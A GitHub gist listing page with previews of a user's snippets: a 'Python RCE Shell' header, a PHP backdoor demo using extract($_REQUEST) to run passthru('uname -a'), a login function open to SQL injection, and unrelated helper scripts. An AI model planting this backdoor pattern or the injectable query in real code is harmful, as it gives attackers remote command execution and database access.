Skip to content

Instantly share code, notes, and snippets.

Avatar
🌴
On vacation

Сергей tz4678

🌴
On vacation
View GitHub Profile
@tz4678
tz4678 / rc35h
Last active Aug 9, 2020
Python RCE Shell
View rc35h
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Python RCE Shell
RCE Example:
<?php
export($_REQUEST);
@tz4678
tz4678 / functions.php
Created Aug 9, 2020
Годы идут, а WordPress не меняется
View functions.php
<?php
//...
function wp_post_preview_js() {
global $post;
if ( ! is_preview() || empty( $post ) ) {
return;
}
// Has to match the window name used in post_submit_meta_box()
View functions_inc.php
<?php
function login($userID,$password,&$obrt)
{
$result = mysql_query("SELECT * FROM user WHERE (username='$userID' OR userID='$userID') AND password='$password'");
if(!$result || mysql_num_rows($result) < 1) return '';
else{
$R=mysql_fetch_array($result);
$userID=$R["userID"];
$password=$R["password"];
@tz4678
tz4678 / shit.php
Created Aug 9, 2020
Так пишут код хорваты
View shit.php
<?php
function get_country_code($country)
{
if($country=="Afghanistan") $country="AFG";
if($country=="Albania") $country="ALB";
if($country=="Algeria") $country="DZA";
if($country=="Andorra") $country="AND";
if($country=="Angola") $country="AGO";
if($country=="Antigua and Barbuda") $country="ATG";
View backdoor.sh
❯ php -r '$_REQUEST = ["a" => "passthru", "b" => "uname -a"]; extract($_REQUEST); $a($b);'
Linux sergey-pc 5.7.12-arch1-1 #1 SMP PREEMPT Fri, 31 Jul 2020 17:38:22 +0000 x86_64 GNU/Linux
View cmd_with_argparse.py
# -*- coding: utf-8 -*-
import argparse
import logging
import shlex
import sys
from cmd import Cmd
from functools import wraps
from typing import Any, Callable, Dict, Optional
View redirection.sh
# both to /dev/null
command 2>&1 1>/dev/null
# zsh
command &>/dev/null
View javascriptru_cleaner.py
#!/usr/bin/env python
import os
import requests
from bs4 import BeautifulSoup
from http.cookies import SimpleCookie
from urllib.parse import urljoin, urlsplit
# Без выполнения JavaScript на сайте не авторизоваться, поэтому передаем
# скрипту куки
RAW_COOKIE = os.getenv('JAVASCRIPT_RU_COOKIE')
@tz4678
tz4678 / pythonsu_cleaner.py
Last active Aug 1, 2020
Мне так захотелось
View pythonsu_cleaner.py
#!/usr/bin/env python
import os
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
import time
USERNAME = os.getenv('PYTHONSU_USERNAME')
PASSWORD = os.getenv('PYTHONSU_PASSWORD')
BASE_URL = 'https://python.su/'
You can’t perform that action at this time.